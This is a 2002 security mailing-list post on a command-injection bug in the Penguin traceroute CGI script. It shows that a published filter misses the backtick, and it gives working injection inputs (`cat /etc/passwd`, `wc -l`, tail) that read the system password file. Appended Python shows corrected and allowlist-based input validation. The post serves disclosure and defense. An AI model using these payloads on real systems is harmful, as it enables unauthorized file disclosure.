From: Marco van Berkum (m.v.berkumobit.nl)
Date: Mon Jun 17 2002 - 07:03:43 CDT


    Hi,

    As I was surfing through some older Securityfocus archives I stumbled
    across the article about Penguin traceroute v1.0:

    http://online.securityfocus.com/archive/1/263285

    This article described some metacharacter bugs in this CGI script, and it
    also included a suggested fix.

    <quote>
    Fix
       ===
       Open up the perl script in your favorite text editor, find a line that has
       "$host = $q->param('host');" Its usually the 13th line down then just add
       this line "$host =~ s/[;<>\*\|'&\$!?#\(\)\[\]\{\}:'"\\]//g;" under it and
       that should parse out any unwanted characters.
    </quote>

    Well, yes, it does parse out some metacharacters, but the " ` " (backtick)
    is not filtered out in any way (probably one of the two quotes " ' " should be
    a backtick). Also the slash and the hyphen are not filtered.

    Example:
    entering `cat /etc/passwd` gives us:

    Taceroute to `cat /etc/passwd`
    traceroute: unknown host root:*:0:0:Charlie

    This is only the first line because only that one gets interpreted by traceroute.
    But there are ways around this to retrieve the full file with some patience:

    Taceroute to `wc -l /etc/passwd`
    traceroute to 18 (0.0.0.18), 64 hops max, 40 byte packets

    So we see that in this case the passwd file is 18 lines long.
    We could retrieve the rest by doing tail -n 18 /etc/passwd, tail -n 17, etc.

    The author and the first person that found a bug in this script (Paul Jenkins)
    have been notified.

    Second fix: replace the second quote by a backtick and add slash and hyphen
    to the filter :)

    Cheers,
    Marco van Berkum

    --
    |  Marco van Berkum / MB17300-RIPE     |
    | m.v.berkumobit.nl / http://ws.obit.nl     |
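As an added example (not part of Marco's post or of the Penguin traceroute script), the Python below reproduces the advisory's blacklist regex, the corrected blacklist the post proposes, and an allowlist alternative that never hands user input to a shell; the hostname regex and the `traceroute_argv` helper are my own assumptions, not code from either source.

```python
import re
import ipaddress

# Blacklist from the Securityfocus advisory quoted in the post (character class
# reproduced as published; the second "'" was almost certainly meant to be a backtick).
ORIGINAL_FILTER = re.compile(r"[;<>\*\|'&\$!?#\(\)\[\]\{\}:'\"\\]")

# The fix proposed in the post: backtick instead of the duplicate quote, plus slash
# and hyphen (hyphen placed last so it is literal inside the class). Note that
# stripping "-" also mangles legitimate names such as my-host.example.com, which is
# one reason to prefer the allowlist below over any blacklist.
CORRECTED_FILTER = re.compile(r"[;<>\*\|'&\$!?#\(\)\[\]\{\}:`\"\\/-]")

# Allowlist (assumption, not from the post): RFC 1123 style labels, 1-63 chars each,
# no leading or trailing hyphen, 253 chars total; IPv4 literals handled separately.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def original_filter(host: str) -> str:
    """Strip only the characters the advisory's regex names (backtick survives)."""
    return ORIGINAL_FILTER.sub("", host)


def corrected_filter(host: str) -> str:
    """Strip the advisory's characters plus backtick, slash and hyphen."""
    return CORRECTED_FILTER.sub("", host)


def is_valid_hostname(host: str) -> bool:
    """Allowlist check: syntactically valid hostname or IPv4 address, nothing else."""
    try:
        ipaddress.IPv4Address(host)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(host) is not None


def traceroute_argv(host: str) -> list:
    """Build an argv list for traceroute with no shell involved. Rejects anything
    that fails the allowlist, so shell metacharacters never reach a shell at all,
    whether or not a blacklist happened to name them."""
    if not is_valid_hostname(host):
        raise ValueError("invalid host: %r" % host)
    return ["traceroute", host]
```

Run the list with `subprocess.run(traceroute_argv(host))` rather than through `system()` or backticks, so the argument is passed to the program directly instead of being parsed by a shell.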